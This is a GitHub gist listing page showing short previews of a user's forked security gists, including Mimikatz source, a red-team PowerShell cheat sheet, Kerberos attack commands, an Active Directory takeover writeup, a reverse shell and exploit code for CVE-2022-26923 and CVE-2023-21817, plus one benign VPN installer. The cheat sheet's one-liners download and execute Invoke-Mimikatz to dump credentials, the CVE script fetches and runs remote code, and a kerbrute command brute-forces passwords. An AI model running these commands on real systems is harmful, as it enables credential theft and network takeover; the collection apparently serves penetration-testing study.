Dviros
/ katz.cs
Last active
March 11, 2019 17:02
— forked from pljoel/katz.cs
Updated Katz.cs - Mimikatz 2.1.1
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Text; | |
| using System.IO.Compression; | |
| using System.EnterpriseServices; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| using System.Security.Cryptography; | |
| /* |
Dviros
/ RedTeam_CheatSheet.ps1
Created
March 7, 2019 16:38
— forked from m8sec/RedTeam_CheatSheet.ps1
Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Invoke-Mimikatz: Dump credentials from memory | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
| # Run IronPython SafetyKatz code using the embedded IPY engine | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/m8r0wn/OffensiveDLR/master/Invoke-IronKatz.ps1');" | |
| # Import Mimikatz Module to run further commands | |
| powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')" | |
| # Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)] |
Dviros
/ wireguard_pihole_install.sh
Created
April 29, 2019 19:49
— forked from sethenoka/wireguard_pihole_install.sh
A script for installing a Wireguard VPN with Pi-Hole (Unbound) recursive DNS
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # This file is designed to spin up a Wireguard VPN quickly and easily, | |
| # including configuring Pi-Hole as a recursive local DNS server using | |
| # Unbound to block ads a the DNS level | |
| # | |
| # Make sure to change the public/private keys before running the script | |
| # Also change the IPs, IP ranges, and listening port if desired | |
| # add wireguard repo | |
| sudo add-apt-repository ppa:wireguard/wireguard -y |
Dviros
/ Preparación OSCP.md
Created
April 3, 2020 14:19
— forked from s4vitar/Preparación OSCP.md
Dviros
/ kerberos_attacks_cheatsheet.md
Created
June 15, 2020 20:12
— forked from knethteo/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
Dviros
/ Workstation-Takeover.md
Created
July 25, 2021 20:50
— forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure
In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;
- Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
- Relaying that machine authentication to LDAPS for configuring RBCD
- RBCD takeover
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
Dviros
/ osed-setup.bat
Created
September 14, 2021 10:41
— forked from alichtman/osed-setup.bat
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| :: Windows 10 OSED Setup | |
| :: | |
| :: Connect over RDP with: rdesktop IP -u Offsec -p lab -r disk:kali=/home/kali/OSED/ -P | |
| :: Store files in ~/OSED/files/. Check script for appropriate file locations | |
| :: | |
| :: Extra files sourced from: https://github.com/corelan/windbglib | |
| :: | |
| :::::::::::::::::::::::::::::::::::::::::::::::::::::::: | |
| :: Install mona |
Dviros
/ DynWin32-ReverseShell.ps1
Created
January 30, 2022 15:38
— forked from qtc-de/DynWin32-ReverseShell.ps1
PowerShell reverse shell that uses dynamically resolved Win32 API functions
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| DynWin32-ReverseShell.ps1 is a reverse shell based on dynamically looked up Win32 API calls. | |
| The script uses reflection to obtain access to GetModuleHandle, GetProcAddress and CreateProcess. | |
| Afterwards it uses GetModuleHandle and GetProcAddress to resolve the required WSA functions | |
| from ws2_32.dll. | |
| This script should be used for educational purposes only (and maybe while playing CTF :D). | |
| It was only tested on Windows 10 (x64) and is probably not stable or portable. It's only | |
| purpose is to demonstrate the usage of reflective lookups of Win32 API calls. See it as |
Dviros
/ CVE-2022–26923.ps1
Created
May 12, 2022 07:59
— forked from Wh04m1001/CVE-2022–26923.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| iex(curl https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1 -UseBasicParsing ) | |
| Import-ActiveDirectory | |
| Set-ADComputer WIN-JQTB1UHHF2S -ServicePrincipalNames @{REPLACE="HOST/WIN-JQTB1UHHF2S","RestrictedKrbHost/WIN-JQTB1UHHF2S"} -Verbose | |
| #in my testing i had to set dnshostname to $null first | |
| Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName $null | |
| Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName dc1.batcave.local |
Dviros
/ urbandoor.cs
Created
April 18, 2023 08:50
— forked from monoxgas/urbandoor.cs
Minimal PoC code for Kerberos Unlock LPE (CVE-2023-21817)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using NtApiDotNet; | |
| using NtApiDotNet.Ndr.Marshal; | |
| using NtApiDotNet.Win32; | |
| using NtApiDotNet.Win32.Rpc.Transport; | |
| using NtApiDotNet.Win32.Security.Authentication; | |
| using NtApiDotNet.Win32.Security.Authentication.Kerberos; | |
| using NtApiDotNet.Win32.Security.Authentication.Kerberos.Client; | |
| using NtApiDotNet.Win32.Security.Authentication.Kerberos.Server; | |
| using NtApiDotNet.Win32.Security.Authentication.Logon; | |
| using System; |
OlderNewer